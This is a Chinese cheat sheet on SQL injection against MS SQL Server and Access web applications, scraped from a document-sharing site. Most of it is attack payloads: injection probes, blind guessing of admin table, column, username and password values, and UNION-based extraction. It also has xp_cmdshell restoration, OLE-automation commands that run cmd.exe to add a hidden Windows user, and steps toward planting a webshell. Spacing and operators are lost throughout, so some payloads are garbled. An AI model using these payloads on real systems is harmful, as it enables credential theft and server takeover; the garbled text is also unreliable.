SQL注入语句标准语法要点是如何的.docx
![资源得分’ title=](/images/score_1.gif)
![资源得分’ title=](/images/score_1.gif)
![资源得分’ title=](/images/score_1.gif)
![资源得分’ title=](/images/score_1.gif)
![资源得分’ title=](/images/score_05.gif)
《SQL注入语句标准语法要点是如何的.docx》由会员分享,可在线阅读,更多相关《SQL注入语句标准语法要点是如何的.docx(17页珍藏版)》请在淘文阁 - 分享文档赚钱的网站上搜索。
1、SQL注入语句标准语法要点是如何的SQL注入语句标准语法要点是如何的所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终到达欺骗服务器执行恶意的SQL命令。很多情况下由于程序员的安全意识薄弱或基本功缺乏就容易导致sql注入安全问题,建议大家多看一下网上的安全文章,最好的防备就是先学会攻击,下面一起看看要点!方法技巧1.判定有无注入点and1=1and1=22.猜表一般的表的名称无非是adminadminuseruserpasspassword等.and0(selectcount(*)from*)and0(selectcount(*)fromadmin)
2、-判定能否存在admin这张表3.猜帐号数目假如碰到0返回正确页面1返回错误页面讲明帐号数目就是1个and0(selectcount(*)fromadmin)and1(selectcount(*)fromadmin)4.猜解字段名称在len()括号里面加上我们想到的字段名称.and1=(selectcount(*)fromadminwherelen(*)0)-and1=(selectcount(*)fromadminwherelen(用户字段名称name)0)and1=(selectcount(*)fromadminwherelen(密码字段名称password)0)5.猜解各个字段的长度猜解
3、长度就是把0变换直到返回正确页面为止and1=(selectcount(*)fromadminwherelen(*)0)and1=(selectcount(*)fromadminwherelen(name)6)错误and1=(selectcount(*)fromadminwherelen(name)5)正确长度是6and1=(selectcount(*)fromadminwherelen(name)=6)正确and1=(selectcount(*)fromadminwherelen(password)11)正确and1=(selectcount(*)fromadminwherelen(pass
4、word)12)错误长度是12and1=(selectcount(*)fromadminwherelen(password)=12)正确6.猜解字符and1=(selectcount(*)fromadminwhereleft(name,1)=a)-猜解用户帐号的第一位and1=(selectcount(*)fromadminwhereleft(name,2)=ab)-猜解用户帐号的第二位就这样一次加一个字符这样猜,猜到够你刚刚猜出来的多少位了就对了,帐号就算出来了and1=(selecttop1count(*)fromAdminwhereAsc(mid(pass,5,1)=51)-这个查询语句
5、能够猜解中文的用户和密码.只要把后面的数字换成中文的ASSIC码就OK.最后把结果再转换成字符.groupbyusers.idhaving1=1-groupbyusers.id,users.username,users.password,users.privshaving1=1-insertintousersvalues(666,attacker,foobar,0xffff)-UNIONSELECTTOP1COLUMN_NAMEFROMINFORMATION_SCHEMA.COLUMNSWHERETABLE_NAME=logintable-UNIONSELECTTOP1COLUMN_NAMEF
6、ROMINFORMATION_SCHEMA.COLUMNSWHERETABLE_NAME=logintableWHERECOLUMN_NAMENOTIN(login_id)-UNIONSELECTTOP1COLUMN_NAMEFROMINFORMATION_SCHEMA.COLUMNSWHERETABLE_NAME=logintableWHERECOLUMN_NAMENOTIN(login_id,login_name)-UNIONSELECTTOP1login_nameFROMlogintable-UNIONSELECTTOP1passwordFROMlogintablewherelogin_
7、name=Rahul-看服务器打的补丁=出错了打了SP4补丁and1=(selectVERSION)-看数据库连接账号的权限,返回正常,证实是服务器角色sysadmin权限。and1=(SELECTIS_SRVROLEMEMBER(sysadmin)-判定连接数据库帐号。(采用SA账号连接返回正常=证实了连接账号是SA)andsa=(SELECTSystem_user)-anduser_name()=dbo-and0(selectuser_name()-看xp_cmdshell能否删除and1=(SELECTcount(*)FROMmaster.dbo.sysobjectsWHERExtype
8、=XANDname=xp_cmdshell)-xp_cmdshell被删除,恢复,支持绝对途径的恢复;EXECmaster.dbo.sp_addextendedprocxp_cmdshell,xplog70.dll-;EXECmaster.dbo.sp_addextendedprocxp_cmdshell,c:inetpubwwwrootxplog70.dll-反向PING本人实验;usemaster;declaresint;execsp_oacreatewscript.shell,sout;execsp_oamethods,run,NULL,cmd.exe/cping192.168.0.1-
9、加帐号;DECLAREshellINTEXECSP_OACREATEwscript.shell,shellOUTPUTEXECSP_OAMETHODshell,run,null,C:WINNTsystem32cmd.exe/cnetuserjiaoniang$1866574/add-创立一个虚拟目录E盘:;declareointexecsp_oacreatewscript.shell,ooutexecsp_oamethodo,run,NULL,cscript.exec:inetpubwwwrootmkwebdir.vbs-w默认Web站点-ve,e:-访问属性:(配合写入一个webshell)
10、declareointexecsp_oacreatewscript.shell,ooutexecsp_oamethodo,run,NULL,cscript.exec:inetpubwwwrootchaccess.vbs-aw3svc/1/ROOT/e+browse爆库特殊技巧::%5c=或者把/和修改%5提交and0(selecttop1pathsfromnewtable)-得到库名(从1到5都是系统的id,6以上才能够判定)and1=(selectnamefrommaster.dbo.sysdatabaseswheredbid=7)-and0(selectcount(*)frommaster
11、.dbo.sysdatabaseswherename1anddbid=6)依次提交dbid=7,8,9.得到更多的数据库名and0(selecttop1namefrombbs.dbo.sysobjectswherextype=U)暴到一个表假设为adminand0(selecttop1namefrombbs.dbo.sysobjectswherextype=Uandnamenotin(Admin)来得到其他的表。and0(selectcount(*)frombbs.dbo.sysobjectswherextype=Uandname=adminanduid(str(id)暴到UID的数值假设为1
12、8779569uid=idand0(selecttop1namefrombbs.dbo.syscolumnswhereid=18779569)得到一个admin的一个字段,假设为user_idand0(selecttop1namefrombbs.dbo.syscolumnswhereid=18779569andnamenotin (id,.)来暴出其他的字段and0(selectuser_idfromBBS.dbo.adminwhereusername1)能够得到用户名依次能够得到密码。假设存在user_idusername,password等字段and0(selectcount(*)from
13、master.dbo.sysdatabaseswherename1anddbid=6)and0(selecttop1namefrombbs.dbo.sysobjectswherextype=U)得到表名and0(selecttop1namefrombbs.dbo.sysobjectswherextype=Uandnamenotin(Address)and0(selectcount(*)frombbs.dbo.sysobjectswherextype=Uandname=adminanduid(str(id)判定id值and0(selecttop1namefromBBS.dbo.syscolumn
14、swhereid=773577794)所有字段?id=-1unionselect1,2,3,4,5,6,7,8,9,10,11,12,13,*fromadmin?id=-1unionselect1,2,3,4,5,6,7,8,*,9,10,11,12,13fromadmin(union,access也好用)得到WEB途径;createtabledbo.swap(swappasschar(255);-and(selecttop1swappassfromswap)=1-;CREATETABLEnewtable(idintIDENTITY(1,1),pathsvarchar(500)Declaret
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- SQL 注入 语句 标准 语法 要点 如何
![提示](https://www.taowenge.com/images/bang_tan.gif)
限制150内